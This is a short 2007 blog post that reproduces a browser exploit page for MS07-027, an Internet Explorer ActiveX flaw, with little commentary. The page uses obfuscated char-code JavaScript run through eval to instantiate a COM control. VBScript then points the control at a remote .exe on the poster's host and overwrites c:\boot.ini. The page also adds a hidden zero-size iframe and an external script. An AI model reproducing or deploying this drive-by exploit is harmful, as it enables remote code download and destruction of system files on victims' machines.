http://cctmv.com/

Browser  it  And See IT

-------------------------------------------Index.htm-----------------------------------
<html>
<title> FlstX MS07-027 Oday </title>
<body>
<script>
t="60,79,66,74,69,67,84,32,105,100,61,34,116,97,114,103,101,116,34,32,99,108,97,115,115,105,100,61,34,99,108,115,105,100,58,100,52,102,101,54,50,50,55,45,49,50,56,56,45,49,49,100,48,45,57,48,57,55,45,48,48,97,97,48,48,52,50,53,52,97,48,34,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
<script language="vbscript">
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="Http://www.cctmv.com/txet.exe"
target.SaveAs "c:\boot.ini"
<iframe src=DNS.htm width=0 height=0></iframe>
<script src="flstx.js"></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
</script>
</body>
</html>
-------------------------------------------------------------------------------------------------
posted on 2007-06-28 22:27  %5C  阅读(303)  评论(0编辑  收藏  举报